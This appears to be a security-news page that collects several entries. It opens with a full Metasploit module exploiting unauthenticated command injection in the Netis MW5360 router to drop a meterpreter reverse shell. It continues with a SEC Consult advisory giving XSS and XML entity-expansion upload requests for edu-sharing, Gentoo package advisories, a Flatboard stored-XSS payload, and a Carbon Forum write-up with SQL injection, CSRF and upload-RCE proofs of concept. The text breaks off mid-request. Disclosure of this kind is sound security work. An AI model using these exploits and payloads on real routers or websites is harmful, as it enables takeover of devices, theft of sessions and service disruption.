The Netis MW5360 router has a command injection vulnerability via the password parameter on the login page. The vulnerability stems from improper handling of the "password" parameter within the router's web interface. The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to V1.0.1.3442 are vulnerable. Attackers can inject a command in the password parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take control of the router.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Netis router MW5360 unauthenticated RCE.',        'Description' => %q{          Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.          The vulnerability stems from improper handling of the "password" parameter within the router's web interface.          The router's login page authorization can be bypassed by simply deleting the authorization header,          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker          to take control of the router.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Adhikara13' # Discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-22729'],          ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']        ],        'DisclosureDate' => '2024-01-11',        'Platform' => ['linux'],        'Arch' => [ARCH_MIPSLE],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_MIPSLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])    ])  end  def execute_command(cmd, _opts = {})    # cleanup payload file when session is established.    if cmd.include?('chmod +x')      register_files_for_cleanup(cmd.split('+x')[1].strip)    end    # skip last command to remove payload because it does not work    unless cmd.include?('rm -f')      payload = Base64.strict_encode64("`#{cmd}`")      print_status("Executing #{cmd}")      send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),        'vars_post' => {          'password' => payload,          'quick_set' => 'ap',          'app' => 'wan_set_shortcut'        }      })    end  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),      'vars_post' => {        'mode_name' => 'skk_get',        'wl_link' => 0      }    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')    # trying to get the model and version number    # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)    # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison    unless version.nil?      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop      # The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3D      if version[2].upcase.split('-V')[0].include?('-')        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')      else        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')      end      # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower      if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))        return CheckCode::Appears(version[2].chop.to_s)      end      return CheckCode::Safe(version[2].chop.to_s)    end    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed      execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])    end  endend

Netis MW5360 Remote Command Execution

Edu-Sharing suffers from an arbitrary file upload vulnerability. Versions below 8.0.8-RC2, 8.1.4-RC0, and 9.0.0-RC19 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20240620-0 >  
=======================================================================  
               title: Arbitrary File Upload  
             product: edu-sharing (metaVentis GmbH)  
vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19  
      fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19  
          CVE number: CVE-2024-28147  
              impact: high  
            homepage: https://edu-sharing.com  
               found: 2024-04-04  
                  by: Kai Zimmermann (Office Frankfurt)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"edu-sharing software enables you to network your learning platforms and other  
educational software. Share learning content, metadata and tools - make them  
available in an educational cloud and let your users use them in all connected  
systems."

Source: https://edu-sharing.com

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can upload arbitrary files in the upload function for  
collection preview images. An attacker may upload an HTML file that includes  
malicious JavaScript code which will be executed if a user visits the direct  
URL of the collection preview image (Stored Cross Site Scripting). It is also  
possible to upload SVG files that include nested XML entities. Those are parsed  
when a user visits the direct URL of the collection preview image, which may be  
utilized for a Denial of Service attack.

Proof of concept:  
-----------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can update the preview image of an existing collection  
by sending the following request:

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288

-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";

‰PNG

[...]  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------

The URL parameter "mimetype" can be modified to match any uploaded file. The  
value is directly used in the server's "Content-Type" header.  
Both, the Content-Type request header and the filename parameter in the  
Content-Disposition request header do not need to be included in the data  
boundary inside the request in order to be sent successfully and can therefore  
be removed.  
The preview image can then be accessed by visiting the following URL:  
https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID

a. Stored Cross Site Scripting (HTML Upload)  
The initial request can be modified to include an HTML file, while keeping  
the magic bytes of a PNG image file. The "mimetype" parameter is changed to  
"text/html":

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288

-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";

‰PNG

<!DOCTYPE html>  
<html>  
<body>  
<h1>Test</h1>  
<script>alert(window.location)</script>  
</body>  
</html>  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------

Visiting the preview URL as seen in figure 1 below shows that the JavaScript  
code is executed:  
[01_stored_xss.png]

b. Denial of Service (SVG Upload)  
The initial request can be modified to upload an SVG file containing  
nested XML entities. The "mimetype" parameter is changed to "image%2Fsvg":

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803  
Content-Length: 581

-----------------------------29539943986372261721095197803  
Content-Disposition: form-data; name="file";

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1   
"&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]>  
<svg xmlns="http://www.w3.org/2000/svg">  
  <data>&t2;</data>  
</svg>

-----------------------------29539943986372261721095197803--  
--------------------------------------------------------------------------------

Visiting the preview URL as seen in figure 2 below shows that the XML code is  
parsed:  
[02_denial_of_service]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 9.0 (pre-release)

The vendor confirmed that previous versions (8.0 and 8.1) are affected as well.

Vendor contact timeline:  
------------------------  
2024-04-10: Contacting vendor through security@edu-sharing.com  
2024-04-11: Vendor replied and confirmed security contact.  
             Advisory information has been sent to vendor.  
2024-04-12: Vendor confirmed receiving the advisory and is now trying to  
             reproduce the described behavior.  
2024-05-03: Reminder sent to security@edu-sharing.com, asking for an update on  
             fixing the vulnerability.  
2024-05-07: Vendor provides affected versions. Fixes have already been implemented  
             and published. Vendor is requesting to wait with the public advisory  
             release in order to allow affected customers to perform the next rollout.  
2024-05-07: Vendor provides fixed versions.  
             Public advisory release scheduled for 2024-06-04.  
2024-05-15: Public advisory release postponed to 2024-06-20.  
2024-06-20: Coordinated release of advisory.

Solution:  
---------  
The repository base version in use can be identified in the Admin-Tools.  
The vendor provides a patch for the affected versions:  
* Version 8.0: Update repository version to "8.0.8-RC2" or later  
* Version 8.1: Update repository version to "8.1.4-RC0" or later  
* Version 9.0: Update repository version to "9.0.0-RC19" or later

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Kai Zimmermann / 2024

Edu-Sharing Arbitrary File Upload

Gentoo Linux Security Advisory 202406-5 - Multiple vulnerabilities have been discovered in JHead, the worst of which may lead to arbitrary code execution. Versions greater than or equal to 3.08 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: JHead: Multiple Vulnerabilities  
     Date: June 22, 2024  
     Bugs: #876247, #879801, #908519  
       ID: 202406-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in JHead, the worst of  
which may lead to arbitrary code execution.

Background  
==========

JHead is an EXIF JPEG header manipulation tool.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/jhead  < 3.08        >= 3.08

Description  
===========

Multiple vulnerabilities have been discovered in JHead. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All JHead users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/jhead-3.08"

References  
==========

[ 1 ] CVE-2020-6624  
      https://nvd.nist.gov/vuln/detail/CVE-2020-6624  
[ 2 ] CVE-2020-6625  
      https://nvd.nist.gov/vuln/detail/CVE-2020-6625  
[ 3 ] CVE-2021-34055  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34055  
[ 4 ] CVE-2022-28550  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28550  
[ 5 ] CVE-2022-41751  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41751

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-05

Gentoo Linux Security Advisory 202406-4 - A vulnerability has been discovered in LZ4, which can lead to memory corruption. Versions greater than or equal to 1.9.3-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: LZ4: Memory Corruption  
     Date: June 22, 2024  
     Bugs: #791952  
       ID: 202406-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in LZ4, which can lead to memory  
corruption.

Background  
==========

LZ4 is a lossless compression algorithm, providing compression speed >  
500 MB/s per core, scalable with multi-cores CPU. It features an  
extremely fast decoder, with speed in multiple GB/s per core, typically  
reaching RAM speed limits on multi-core systems.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
app-arch/lz4  < 1.9.3-r1    >= 1.9.3-r1

Description  
===========

An attacker who submits a crafted file to an application linked with lz4  
may be able to trigger an integer overflow, leading to calling of  
memmove() on a negative size argument, causing an out-of-bounds write  
and/or a crash.

Impact  
======

The greatest impact of this flaw is to availability, with some potential  
impact to confidentiality and integrity as well.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All LZ4 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/lz4-1.9.3-r1"

References  
==========

[ 1 ] CVE-2021-3520  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3520

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-04

Flatboard version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Flatboard v3.2  - Stored XSS# Date: 2024-06-23# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://flatboard.org/# Version: 3.2----------------------------------------------------------------------------------------------------1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum2-Click Add Forum and write in  Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>3-Save it , you will be see alert button

Flatboard 3.2 Cross Site Scripting

Gentoo Linux Security Advisory 202406-3 - A vulnerability has been discovered in RDoc, which can lead to execution of arbitrary code. Versions greater than or equal to 6.6.3.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: RDoc: Remote Code Cxecution  
     Date: June 22, 2024  
     Bugs: #927565  
       ID: 202406-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in RDoc, which can lead to execution  
of arbitrary code.

Background  
==========

RDoc produces HTML and command-line documentation for Ruby projects.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-ruby/rdoc  < 6.6.3.1     >= 6.6.3.1

Description  
===========

A vulnerability has been discovered in RDoc. Please review the CVE  
identifier referenced below for details.

Impact  
======

When parsing .rdoc_options (used for configuration in RDoc) as a YAML  
file, object injection and resultant remote code execution are possible  
because there are no restrictions on the classes that can be restored.

When loading the documentation cache, object injection and resultant  
remote code execution are also possible if there were a crafted cache.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All RDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/rdoc-6.6.3.1"

References  
==========

[ 1 ] CVE-2024-27281  
      https://nvd.nist.gov/vuln/detail/CVE-2024-27281

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-03

Carbon Forum version 5.9.0 suffers from access control, cross site request forgery, file upload, outdated library, and remote SQL injection vulnerabilities.

    {-} Title => Carbon Forum 5.9.0 - Multiple Exploits{-} Author => bRpsd [cy@Live.no]{-} Date Release => 22 June, 2024{-} Vendor => Carbon Forum <= 5.9.0    Homepage => https://www.94cb.com/  Download => https://github.com/lincanbin/Carbon-Forum  Vulnerable Versions => 5.9.0 >=  Tested Version => 5.9.0 on xampp Server.#######################################################################################Vulnerability #1 : Reset Administrator Password & Database settingsFile Path: http://localhost/Carbon-Forum/install/INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user##############################################################################################################################################################################Vulnerability #2 : SQL InjectionVulnerable Code: /Carbon-Forum/install/index.phpif ($_SERVER['REQUEST_METHOD'] == 'POST') {  $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。  The SQL File could not be opened.");  //dobefore  if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {    $Language = $_POST['Language'];    $DBHost = $_POST['DBHost'];    $DBName = $_POST['DBName'];    $DBUser = $_POST['DBUser'];    $DBPassword = $_POST['DBPassword'];    $SearchServer = $_POST['SearchServer'];    $SearchPort = $_POST['SearchPort'];    $EnableMemcache = $_POST['EnableMemcache'];    $MemCachePrefix = $_POST['MemCachePrefix'];  } else {    die("An Unexpected Error Occured!");  }  //$WebsitePath = $_POST['WebsitePath'];  $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];  if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {    $WebsitePath = $WebsitePathMatch[1];  } else {    $WebsitePath = '';  }  //初始化数据库操作类  require('../library/PDO.class.php');  $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);  $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));  if (empty($DatabaseExist)) {    $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");  }    POC Request:POST http://localhost/Carbon-Forum/install/?Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 173Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/install/Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / InstallResponse:SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1You can find the error back in the log.#######################################################################################################################################################################################################Vulnerability #3 : CSRF - Change users email File Path: http://localhost/Carbon-Forum/settingsMethod: POSTParameter : UserMailCode:Carbon-Forum/controller/settings.phpPOC:    case 'UpdateUserInfo':      $CurUserInfo['UserSex']      = intval(Request('POST', 'UserSex', 0));      $CurUserInfo['UserMail']     = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];      $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));      $CurUserInfo['UserIntro']    = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));      $UpdateUserInfoResult        = UpdateUserInfo(array(        'UserSex' => $CurUserInfo['UserSex'],        'UserMail' => $CurUserInfo['UserMail'],        'UserHomepage' => $CurUserInfo['UserHomepage'],        'UserIntro' => $CurUserInfo['UserIntro']      ));      if ($UpdateUserInfoResult) {        $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];<form method='POST' action='http://localhost/Carbon-Forum/settings'>        <input type="hidden" name="Action" value="UpdateUserInfo">        <input type="hidden" name="UserSex" value="0">        <input type="hidden" name="UserMail" value="changed@new-email.com">        <input type="hidden" name="UserHomepage" value="">        <input type="hidden" name="UserIntro" value="">      <input type='submit' value='submit'>    </form>    #######################################################################################################################################################################################################Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]Info: Administrator can change allowed files in dashboard -> parameterPOC POST:http://localhost/Carbon-Forum/dashboard#dashboard4Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 14662Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/dashboardCookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktopUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制，单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制，单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制，单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制，单位B，默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制，单位B，默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 